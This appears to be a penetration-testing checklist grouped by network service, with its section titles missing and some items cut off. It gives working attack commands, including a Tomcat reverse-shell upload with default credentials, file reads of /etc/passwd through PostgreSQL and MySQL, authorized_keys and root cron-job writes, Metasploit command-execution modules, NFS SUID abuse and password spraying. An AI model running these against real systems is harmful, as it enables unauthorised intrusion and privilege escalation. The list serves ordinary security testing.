-
Enumeration
Mandatory
Try to check out a repo: svn checkout svn://$target
Optional
Check all branches.
Go through each revision. (Use grep widely!)
Add a new file which could be accessible in the web.
-
Enumeration
Mandatory
Check on the HTTP port 8080 if /manager is accessible (default credentials: tomcat / s3cret or admin / admin). If yes, upload a reverse shell WAR file.
Optional
Try to brute-force with msf> use scanner/http/tomcat_mgr_login.
-
Enumeration
Mandatory
Try to connect: telnet $target 6379 // or: redis-cli -h $target
...
info
CONFIG GET *
system.exec "id"
Try to check if you can determine the existence of directories:
config set dir /var/www/htdocs
-ERR Changing directory: No such file or directory
config set dir /etc
+OK
Try to write. General commands:
config set dir /var/www/html
+OK
config set dbfilename t.txt
+OK
set test "hallo"
+OK
save
+OK
Possible places: Upload a…
-
Enumeration
Mandatory
Optional
-
Enumeration
Optional
Brute force with nmap.
-
Enumeration
Mandatory
Try to connect.
Optional
Privilege escalation within PSQL to superuser: https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-privesc/
Try to read files:
postgres=# CREATE TABLE demo(t text);
CREATE TABLE
postgres=# COPY demo from '/etc/passwd';
COPY 20
postgres=# SELECT * FROM demo;
Try to write a file:
COPY (select convert_from(decode('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','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';
-
Enumeration
Mandatory
Try to connect within a window manager: rdesktop $target
Optional
If you have shell access, try to create a new user account which is in the group Remote Desktop Users, or add this group to an existing user.
-
Enumeration
Mandatory
Try to connect to the DB.
Enumerate with nmap: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target
Optional
If you have access to the DB:
Try to read local files: SELECT load_file('/etc/passwd');
Try to write files:
CREATE TABLE bbb(content TEXT);
INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
-
Enumeration
Mandatory
Determine version: nmap -p 445 --script ms-sql-info $target
If credentials are known:
Try to connect to the DB (alternative: IntelliJ, …): sqsh -U sa -P $password -S $target:1433
Try to execute commands:
msf> use auxiliary/admin/mssql/mssql_exec
msf> use windows/mssql/mssql_payload
If mssql_exec doesn't work, take care of domain/username and powershell.exe -command type system.
Optional
Brute-force login (e.g. with msf> use…
-
Enumeration
Mandatory
Check configuration: nmap -sSVC --script rmi-dumpregistry -p 1100 $target
Optional
Try msf> use scanner/misc/java_rmi_server to check whether class upload is possible; if yes, try msf> use multi/misc/java_rmi_server.
Try to exploit with BaRMIe.
-
Enumeration
Mandatory
Check which streams are open: nmap --script rtsp-url-brute -p 554 $target
-
Enumeration
Mandatory
Enumerate with ike-scan.
-
See the LDAP checklist
-
Enumeration
Mandatory
Enumerate with nmap: nmap -n -sV --script "ldap* and not brute" $target
Scan with ldapsearch: ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local"
Connect to the SSL ports:
openssl s_client -connect $target:636 </dev/null
openssl s_client -connect $target:3269 </dev/null
-
Note: 139 = NetBIOS, a session layer protocol and service, which is different from 445 SMB.
Enumeration
Mandatory
If you have no credentials yet:
If you already have user credentials:
On Windows
Optional
-
Enumeration
Mandatory
Get a list of registered programs via rpcbind/v2 (formerly portmapper!): rpcinfo -p $target
Get a list of registered programs via rpcbind/v3: rpcinfo -s $target
If successful:
Connect with the RPC console: rpcclient -U "" $target
Enumerate with the queries from the RPC protocol post.
Optional
Try to brute-force accounts (no lockout here!)
Try other enumeration tools from the…
-
Enumeration
Mandatory
Show users and processes from known ports: ident-user-enum $target 139 445 … <- add all known ports here
-
Enumeration
Mandatory
Check if the target exposes open shares: showmount -e $target
If there are some, try to mount them. If you can mount them, check if you can write files and set the s flag (possible if no_root_squash is defined in the export). If yes, create a new file with a suid bit.
Optional
Try to use another NFS…
-
Enumeration
Tools
kerbrute: python3 /opt/kerbrute/kerbrute.py -domain thinc.local -users /usr/share/seclists/Usernames/Names/names.txt -dc-ip $target
Alternative: https://github.com/ropnop/kerbrute
msf> use auxiliary/gather/kerberos_enumusers
Perform ASREPRoast
-
Enumeration
Mandatory
Grab the banner.
Tools
Patator (brute force)
-
Enumeration
Mandatory
Try to access: ssh -v $target
Optional
Reuse existing credentials.
Brute-force with existing usernames (password spraying).
Try ssh-audit $target
Try known usernames with the username as password, or other found strings.
Privilege Escalation
Find the .ssh directory on the file system and check all files within.
Check the sshd_config file.
Check the SSH version for exploits.
-
Enumeration
Check the certificate.
Perform an SSL scan.
Go to Checklist 80 HTTP.
Optional
If vulnerable to Heartbleed, use msf> use openssl_heartbleed. Don't forget to use set ACTION KEYS or similar (see info).
-
Enumeration
Mandatory
Check anonymous login.
Try to create AND upload a file:
mkdir test
put /tmp/test test
Check login with at least the following credentials:
admin / admin
admin / password
Optional
Download everything with wget and look for .dot files!
Check login with newly found users.
Brute-force login. Make sure to check admin / admin and other usual combinations…
-
Enumeration
Mandatory
Optional
Tools
-
Without shell access
With shell access
Choose one method to enumerate.
1. User and group enumeration with net (!)
See what roles/privileges THIS USER has, also locally. Maybe this user already has administrative privileges: whoami /all
List (and store!) the users of the domain: net user /domain
List (and store!) information like full names, group memberships, etc.…